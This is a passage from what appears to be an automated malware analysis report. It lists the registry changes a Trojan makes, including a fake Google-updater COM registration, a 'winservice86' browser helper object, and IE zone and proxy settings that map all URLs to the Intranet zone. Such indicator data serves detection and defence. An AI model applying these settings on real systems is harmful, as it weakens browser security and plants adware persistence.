"brand" = "GGLS"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 88 C3 36 07 0E DE 7F DC A9 ED DE ED E2 55 71"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:3944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 58 90 39 89 16 B8 29 AA 2D EF 95 C6 6A 4F A8"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 35 6D 94 29 04 1E 59 A6 E8 CB A9 DB 20 2B EF"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 7E 01 12 B8 CD 08 A1 51 AA E0 02 82 43 95 5F"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"pv" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"tttoken"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 41 F5 11 07 A9 04 E6 CD 98 CB F8 47 74 7A 50"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process 17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 61 B7 7F B7 9F 4C ED B5 6F F7 42 2C C1 2B 9E"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611471155}" = ""

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppPath" = "%Program Files%\winservice86"
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppPath" = "%Program Files%\winservice86"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-helper.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"Policy" = "3"
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil64.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611471155}" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"AppPath" = "%Program Files%\winservice86"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"

The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 7A 13 E3 74 1B A1 1E 22 F2 42 83 C6 93 A3 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process 17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 B8 EF 07 45 62 71 F2 C0 1F CD 6C AA F9 EC B5"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The process 17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 90 E6 8B C3 89 B7 8A 48 11 37 9B 49 48 05 7C"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The process winservice86-bg.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 62 9B 3A 74 C7 7E 5A D7 9F 50 C9 E5 DA 1B A1"

The process winservice86-codedownloader.exe:2888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 28 FC A9 F1 AD 20 35 6E 84 27 D8 47 E2 FC 3A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process winservice86-codedownloader.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A B5 DB 82 26 76 08 BF EF 7E DF CF EC 86 B8 AD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\HELPDIR]
"(Default)" = "%Program Files%\winservice86"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"Version" = "1.0"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
"(Default)" = ""

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}]
"(Default)" = "ISandBox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "winservice86"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}]
"(Default)" = "ICrossriderBHO"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"

[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1"

[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"Version" = "1.0"

[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755 Type Library"

